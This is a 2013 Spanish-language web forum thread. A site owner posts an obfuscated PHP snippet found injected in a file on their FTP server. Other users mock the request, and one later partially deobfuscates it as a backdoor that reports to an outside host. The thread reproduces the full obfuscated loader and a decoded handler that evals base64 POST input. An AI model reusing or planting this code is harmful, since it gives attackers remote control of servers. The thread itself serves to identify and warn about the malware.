Posible codigo malicioso

matiasbmx · #1 (**permalink**) 07/08/2013, 08:43

Hola, abriendo un archivo .php en el ftp me pillé con una sorpresa, me encontré con un codigo que jamás he puesto, ni nadie lo ha puesto a la ''buena'', parece ser una función php encriptada... a ver si alguien puede ayudarme con decirme qué es y para que sirve:

/*versio:2.20*/$Il1l=104325;if (!function_exists('I1I1I1ll')){$GLOBALS['Il1l'] = 'OY3VybAeRhX2luaXQ)YWxsb3dfdXJsX2ZvcGVuLuvOMMQOdaH R0cDovLw=NCjpJndheT1maWxlX2dldF9jb250ZW50cwC%kX3Nl dG9wdAhX2V4ZWMBt)#?bJndheT1jdXJsaqKLwzb3Nvbi5pbgP! MUllBTkVDQVNFWS5DT00~xNgRccGhwYWlkZS5jb20HdwWV8P@O g=)xZGlzcGxheV9lcnJvcnMV=)ZGV0ZXJtaW5hdG9y*%&J{_Zn RwMTMP?{Mi4yMAXuSUkxbGxsbGw.gYmFzZTY0X2RlY29kZQ&iY mFzZTY0X2VuY29kZQ(SFRUUFMWNb2ZmF?^aHR0cHM6Ly8Tf;SF RUUF9IT1NUdW5pb24lEdc2VsZWN0AWON}NUkVRVUVTVF9VUkk$ &mU0NSSVBUX05BTUUKUVVFUllfU1RSSU5HqXKDuhPwZIjKL2Rl di9zaG0qLCL3RtcC8uZm9udC11bml4kTTL3RtcC8uSUNFLXVua XgbCVE1QTxvVEVNUA$}VE1QRElSL3RtcAudXBsb2FkX3RtcF9k aXIuW$dG1wVUd3AtY29udGVudC91cGxvYWRz(XpBTd3AtY29ud GVudC9jYWNoZQHwILgb&dmVyc2lv#(j(LQdwoSMLXBocAr@ RVhFQ1BIUAGb3V0rP}b2sL=SFRUUF9VU0VSX0FHRU5Ub)hLAuJ Z29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW 5kZXgPoUL3BnLnBocD91PQ_jMI&?Jms9JnQ9cGhwJnA9{PRJnY 9T*fZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU p5VlY0MXZva2dVLzFlbXBta2dZVGsrUk9WNlhEUmRlelhwaVZy ZFpOTTF4TVd4Sll0Z0FLL2JOUDd2OTk3TXdHREY3cDBtbGM1Nz g3N2Y3ejJpRFZFdTFuUVRKWFN0dE5hMG9OazJTbFpGbXJWVTlZ MXM5a2xZUkdsQzZwUmdROU9OY2ptZCt2RFJ5TlhseUl4SHNVaz hNbDdjMzZ2a2pjaVRiUlJtYVJGdHFWSmtlNnBlazR3Vyt5d2hk UkZ3ZXBDYW5taXhpV0lLUk4rWUdvYUd3a1p4SEtzb0ZqN21DTV RDWC9qR3NXSnFwQVAzZ1JuWWZhQUlIbDF5Z0lndXNQU2pKQXB5 V2lpUzB0T0laYWdhTVlFY1FTQVl5MU1EaTBxOG1zNjJEWWNxOH hPVitsT3ZqeGJqelNCTWs0SW1SUzVGdEx1Z3dGQ0pUb1JIK01S ZDBxWE1qcVVSR3hSVkFSS2lNVFEwemltYVY0WW9vRCtqSEZRSX AxVVdtUmdDSG9QL2ZYR3FzS2pBYzNOVVhJZFp4WGxBVVhQa09p SjBRcEFpMUdqa1pqRzc5eWZ6QUg0MDhqOWROVTBYMkN6MVE4Rj N3OEhuNFV6YnJNRDNEeGxudy9saU5wN1BCdU9IVzdnZ3F1dzgv NDAvSGc5djV2UFIzME4vTWRlSVU4Wmc2dlBvc1hDVTkxQlV1TS 9pSUl6VG5OWk9NUjkwdXl0ZUZYRVpzaURGU0YvdHRrWWd6QWVa VnNaVHBwWFZFR3NDVkw3SjAvQkh1cU9KTFA0ZU5nQzRNcDN5Qj hqdGxCdU5GcFFOeEVzUmlFYVRjbkxjb09EU1pyZG45U002dVBY WGNFN2VSS1lPVnkrclZ3OHRvUVc1bTg4bnY1bTY4UzM3bHR5bG VmRTdzSEhURG5qVXFvS0hpaWQzazhCLzBJLzFXNnFPNTErR3M0 ZVJQMjdRdmNocDltbndCRTNEaEROaFRIaXA0T1VaNGVEaUF3UV MvcW5rNm9vbzd4Q0hmSkxrUDhBYUdTa2RJdzQ5V3pQR3RIb01q UG9ia2U4S29DNHhBeXhMOU9jdVR0ZFVhVlUyYXFWSTROc25DRE dDKzlGWXlvYU90azMzR0IvVGlWK3NMOVBFTmg1azJlcTFoa00y YjYxYXM1a09WSVRwSGgxMXNhc2Q3S3dLVGwreXFFQkhvT2g4UT ROZkF4MTY0K1dEdCtJWTRFc1VIV2VTOGx5VElSMnc5emRDRUw5 U0NicVdzZUlVNFV1bFA5MFhrSENrQW5uRVFnVTNEUkJKdytlMF pyc0xxR3FydW1Dc1ZaSGJZMVVrTHVvc2ZpMldwUk5FdHd4YnhB Unp3Y2RhaldwaGVEb0M4QUh1VUpFbnlRaGZYVWFCODFGY296aG RNV2JZVVozU1FaR2x1R05TRit3MmUxd2VISmsxa2x1UmVETkpr b0JRM3Q1Unpvb3BlQmpPb0g4ZUt5YmJaSll1VlpISC9ua1djbE VEQk5zQ1FHK3J2QWVPOWRxMkxSeGhkY2pKdXBjWFdaSEc2UXZO R3BVd2F5MFZxM3lUWm5RVlBrTlJCWWdtcTV5SVRIcC95cFNqc1 NCeWw3TGhoWWV5Mkd6SFJZc1JSMUhDbzdpK2xEWktNQzBuNGxs WkhaRFYrMit5RG1DVmNuRTIxRDJidGRTU3ovdnpkRFk4VHNodH crUmtUR2hUQ051WUo2ako1YS9FNjBjTGlJc3RBZFAxSTRrOGxW V2ZRMjJXYVcxS1plVW5MdzZJcDlmZnJwMXlFdW1pS1hRQjhxSV RSSFVqaUt5akxGa0I2Z2JCN2VoK0dBU3EvbmswZzBucno3NkN0 c2xnTm9CSHJIZ0RQeFhFMWJ4cTgxNnFMeFJZRTlZUjdMVjdsbW p4Qmk4YzdQKzJ1bXdtNGliWUVjVGgrTXVaYThjVVhBQjd6WlJT bWp6QzlrSjRPZDBqSFpzRGs2cVY4WklBNXpnT2FtK2lkQkIvbT BrdXFMY3NJQjMxbmdndWRoOE1Gc0J6MFhRWDVhN0NEMW1TMmFQ dU5XYUpiOE41Z0tDLytzNjJjWG1UMjRJYkl6KzhKdDlCLzQ5cW lCWGJuWGRpY01kMEpJd2IvdlU3NEdyaHBoRjhEUWFMK1YxcjZY bUNqYVFaUm43aVA4d2ZXeWZVY29pVUk2RXZoazFOS2NNQnJZVD Btam0yeWMzaFU2Qk82R0VTeXdVTE4yS0Fib0h1U21tTFpCZUF6 YkM0VC85WnhlVWRrUEFMNDV3ZXo3czh3V2xpcXd5RVljY3ZGSU 05bHNuZ3IwVVFYYWFyU1BmaE0vK1h2ZHlFOFg1Tmd6UUphWG5J Y1pLL2pXSDc5MkdScFVtSVM0ZzRFc1BPWkx0aC8yT3c3M1FOMW 90SFlGOHVRNUxMWlM5SGRhZGNpSkFEUzRtb1N0d2IzbzBDYm9K V1VTODg3NVl0L21LODFWeGw5Y2YyMVBxbTI4VVdNdHRzZTBDL1 pEcTdYZFpjWmRuVkNmd3Q1TFFDdW02YlgrRTFJNGEwUHdXRjFi c3AzOU5ndjVPdnA5ZnZVbkk0N2dyNC9nc3ltakNXIikpKTsVrc HJlZ19yZXBsYWNlQm!';function I1I1I1ll($a, $b){$c=$GLOBALS['Il1l']; $d=pack('H*','6261736536345f6465'.'636f6465'); return $d(substr($c, $a, $b));};$QOO0O0Q0O = I1I1I1ll(3446, 16);$QOO0O0Q0O("/QO0QO0OQO/e", I1I1I1ll(801, 2643), "QO0QO0OQO");};?><?

pateketrueke · #2 (**permalink**) 07/08/2013, 09:08

Me imagino que esperas a que descifremos el misterio y corramos el riesgo por ti, ¿verdad?

Pues no, gracias.

h2swider · #3 (**permalink**) 07/08/2013, 09:13

Cita:

Iniciado por pateketrueke

Me imagino que esperas a que descifremos el misterio y corramos el riesgo por ti, ¿verdad?

Pues no, gracias.

jajajaja

gnzsoloyo · #4 (**permalink**) 07/08/2013, 09:17

Y yo supongo que no se te ocurrió pensar que eso podría estar ofuscado, ¿no?

matiasbmx · #5 (**permalink**) 07/08/2013, 09:23

bastaba con informarme que se puede ofuscar un codigo php para que quede de la forma en que lo puse, no era necesaria tanta mala onda ;) ¿O acaso crees que si yo supiera descifrarlo, les vendría a mendigar ayuda a ustedes?

Erick_MD9 · #6 (**permalink**) 07/10/2013, 14:53

Hola,
Me entretuve un rato desofuscando ese código.
Les dejo una parte, solo para que tengamos presente lo que un codigo ofuscado puede contener.

Al ejecutarse el script, genera back doors para tener
un amplio control sobre el servidor atacado.
¡¡CUIDADO!!
Toda la info le llega a 'http://' ' oson' '.in' ¡¡Cuidado con este servidor!!

Código PHP:

Ver originalif (@$_SERVER["HTTP_Y_AUTH"]==$QO000O or @$_POST["Y_AUTH"]==$QO000O){ 
            echo "\r\n"; 
            @output('versio', $IllIIl.'-'.$II1llI.'-php'); 
            if ($II1I11=base64_decode(@$_POST['EXECPHP'])){ 
                @eval($II1I11);
                echo "\r\n"; @output('out', 'ok'); 
            } 
            exit(0); 
        }

Saludos